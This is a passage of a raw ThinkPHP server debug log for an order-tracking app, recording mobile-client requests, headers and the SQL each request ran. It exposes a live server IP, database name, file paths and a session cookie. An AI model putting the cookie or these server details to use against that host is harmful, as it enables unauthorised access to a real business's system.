SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001368s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE ( 1=1 ) AND `factorymge_id` = 40 AND ( `name` LIKE '%超薄15%' OR `product_num` LIKE '%超薄15%' ) AND `product_status` = '1' ORDER BY kucun asc LIMIT 0,10 [ RunTime:0.001016s ] --------------------------------------------------------------- [ 2022-07-20T17:14:52+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021085s][吞吐率:47.43req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001158s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:52+08:00 ] 106.112.205.110 POST /api/office/product/getproductbywords?userId=100&keywords=%E8%B6%85%E8%96%84150&offset=0&pageNum=10&isAdd=0&faProductId=0 [ info ] 47.105.33.115:8081/api/office/product/getproductbywords?userId=100&keywords=%E8%B6%85%E8%96%84150&offset=0&pageNum=10&isAdd=0&faProductId=0 [运行时间:0.058855s][吞吐率:16.99req/s] [内存消耗:4,452.98kb] [文件加载:73] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000062s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001590s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'office.product', 2 => 'getproductbywords', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=nce81t0u9kp1dno0b3r5stvcd0', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'userId' => '100', 'keywords' => '超薄150', 'offset' => '0', 'pageNum' => '10', 'isAdd' => '0', 'faProductId' => '0', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.002368s ] [ info ] [ RUN ] app\api\controller\office\Product->getproductbywords[ /alidata/www/gendan/application/api/controller/office/Product.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000478s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001700s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 100 LIMIT 1 [ RunTime:0.000511s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001831s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE ( 1=1 ) AND `factorymge_id` = 40 AND ( `name` LIKE '%超薄150%' OR `product_num` LIKE '%超薄150%' ) AND `product_status` = '1' ORDER BY kucun asc LIMIT 0,10 [ RunTime:0.001401s ] --------------------------------------------------------------- [ 2022-07-20T17:14:52+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020941s][吞吐率:47.75req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000047s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001537s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:52+08:00 ] 106.112.205.110 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.026735s][吞吐率:37.40req/s] [内存消耗:3,333.20kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001109s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001490s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000091s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:53+08:00 ] 106.112.205.110 POST /api/office/callcurtain/getDetailCurtainByProId [ info ] 47.105.33.115:8081/api/office/callcurtain/getDetailCurtainByProId [运行时间:0.044103s][吞吐率:22.67req/s] [内存消耗:4,480.40kb] [文件加载:72] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000047s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001120s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'office.callcurtain', 2 => 'getDetailCurtainByProId', ), ) [ info ] [ HEADER ] array ( 'content-type' => 'application/x-www-form-urlencoded', 'content-length' => '25', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=nce81t0u9kp1dno0b3r5stvcd0', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'userId' => '100', 'productId' => '1268', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001583s ] [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\api\controller\office\Callcurtain->getDetailCurtainByProId[ /alidata/www/gendan/application/api/controller/office/Callcurtain.php ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000619s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_callcurtain` [ RunTime:0.001556s ] [ sql ] [ SQL ] SELECT * FROM `ot_callcurtain` WHERE `productinfo_id` = 1268 [ RunTime:0.000338s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001163s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1268 LIMIT 1 [ RunTime:0.000413s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_techprocess` [ RunTime:0.001046s ] [ sql ] [ SQL ] SELECT * FROM `ot_techprocess` WHERE `productinfo_id` = 1268 AND `process_status` = '1' [ RunTime:0.000863s ] --------------------------------------------------------------- [ 2022-07-20T17:14:54+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019699s][吞吐率:50.76req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001072s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:02+08:00 ] 221.192.178.45 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.028862s][吞吐率:34.65req/s] [内存消耗:3,333.20kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000049s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001168s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.002037s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000116s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:02+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.025013s][吞吐率:39.98req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000046s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001189s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:02+08:00 ] 106.112.205.110 POST /api/office/buildorder/buildNewOrderV3 [ info ] 47.105.33.115:8081/api/office/buildorder/buildNewOrderV3 [运行时间:0.069198s][吞吐率:14.45req/s] [内存消耗:4,874.10kb] [文件加载:78] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001128s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'office.buildorder', 2 => 'buildNewOrderV3', ), ) [ info ] [ HEADER ] array ( 'content-type' => 'application/x-www-form-urlencoded', 'content-length' => '365', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=nce81t0u9kp1dno0b3r5stvcd0', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'userId' => '100', 'number' => '', 'kehu_id' => '0', 'order_connect' => '', 'productinfo_id' => '1268', 'zuixinshuoming' => '', 'actual_amount' => '5200', 'kucun_amount' => '0', 'produce_amount' => '5200', 'price' => '0.0', 'responsible_staffinfos' => '101', 'responsible_staffinfovars' => '车间负责人', 'build_time' => '1658246400', 'end_time' => '1658332799', 'remind_day' => '1', 'order_status' => '1', 'childInfo' => '[]', 'proMatInfo' => '[]', 'matMatInfo' => '[]', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001486s ] [ info ] [ RUN ] app\api\controller\office\Buildorder->buildNewOrderV3[ /alidata/www/gendan/application/api/controller/office/Buildorder.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000336s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001418s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1268 LIMIT 1 [ RunTime:0.000316s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001102s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 100 LIMIT 1 [ RunTime:0.000250s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.011663s ] [ sql ] [ SQL ] SELECT * FROM `ot_orderinfo` WHERE `factorymge_id` = 40 AND `pid` = 0 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000753s ] [ sql ] [ SQL ] INSERT INTO `ot_orderinfo` (`number` , `kehu_id` , `order_connect` , `zuixinshuoming` , `actual_amount` , `kucun_amount` , `responsible_staffinfos` , `responsible_staffinfovars` , `productinfo_id` , `produce_amount` , `price` , `build_time` , `end_time` , `remind_day` , `order_status` , `nei_number` , `createtime` , `updatetime` , `factorymge_id` , `build_order_staffid`) VALUES ('' , 0 , '' , '' , 5200 , 0 , '101' , '车间负责人' , 1268 , 5200 , 0 , 1658246400 , 1658332799 , 1 , '1' , '2207-000240' , 1658308502 , 1658308502 , 40 , 100) [ RunTime:0.004718s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderandstaff` [ RunTime:0.001410s ] [ sql ] [ SQL ] DELETE FROM `ot_orderandstaff` WHERE `orderinfo_id` = 6637 [ RunTime:0.001161s ] [ sql ] [ SQL ] INSERT INTO `ot_orderandstaff` (`orderinfo_id` , `productinfo_id` , `kehu_id` , `staffinfo_id` , `createtime` , `factorymge_id`) VALUES (6637 , 1268 , 0 , 101 , 1658308502 , 40) [ RunTime:0.004943s ] --------------------------------------------------------------- [ 2022-07-20T17:15:02+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019400s][吞吐率:51.55req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001090s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:02+08:00 ] 106.112.205.110 POST /api/office/officeorder/getNewestOrder?userId=100&shenhe=1 [ info ] 47.105.33.115:8081/api/office/officeorder/getNewestOrder?userId=100&shenhe=1 [运行时间:0.050686s][吞吐率:19.73req/s] [内存消耗:4,830.88kb] [文件加载:77] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000048s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001224s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'office.officeorder', 2 => 'getNewestOrder', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=nce81t0u9kp1dno0b3r5stvcd0', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'userId' => '100', 'shenhe' => '1', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001691s ] [ info ] [ RUN ] app\api\controller\office\Officeorder->getNewestOrder[ /alidata/www/gendan/application/api/controller/office/Officeorder.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000352s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001471s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 100 LIMIT 1 [ RunTime:0.000371s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001554s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000878s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`factorymge_id` = 40 AND `orderinfo`.`pid` = 0 AND ( order_status in ("1","2") ) ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.002184s ] --------------------------------------------------------------- [ 2022-07-20T17:15:02+08:00 ] 106.112.205.110 POST /api/office/officeorder/getorderlist?userId=100&keywords=&shenhe=1&offset=0&pageNum=10 [ info ] 47.105.33.115:8081/api/office/officeorder/getorderlist?userId=100&keywords=&shenhe=1&offset=0&pageNum=10 [运行时间:0.064597s][吞吐率:15.48req/s] [内存消耗:4,914.58kb] [文件加载:78] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001496s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'office.officeorder', 2 => 'getorderlist', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=nce81t0u9kp1dno0b3r5stvcd0', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'userId' => '100', 'keywords' => '', 'shenhe' => '1', 'offset' => '0', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001641s ] [ info ] [ RUN ] app\api\controller\office\Officeorder->getorderlist[ /alidata/www/gendan/application/api/controller/office/Officeorder.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000390s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001500s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 100 LIMIT 1 [ RunTime:0.000360s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001588s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001154s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`factorymge_id` = 40 AND `orderinfo`.`pid` = 0 AND ( 1=1 ) AND ( order_status in ("1","2") or ( order_status = "3" and kehu_id != 0) ) ORDER BY 1658308502>orderinfo.end_time desc,1658308502>orderinfo.end_time desc,1658308502-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 0,10 [ RunTime:0.002458s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_material` [ RunTime:0.001611s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000421s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000215s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000396s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000334s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000346s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000491s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000357s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000396s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000288s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000234s ] --------------------------------------------------------------- [ 2022-07-20T17:15:02+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020962s][吞吐率:47.71req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001161s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:02+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021814s][吞吐率:45.84req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001192s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:15:02+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 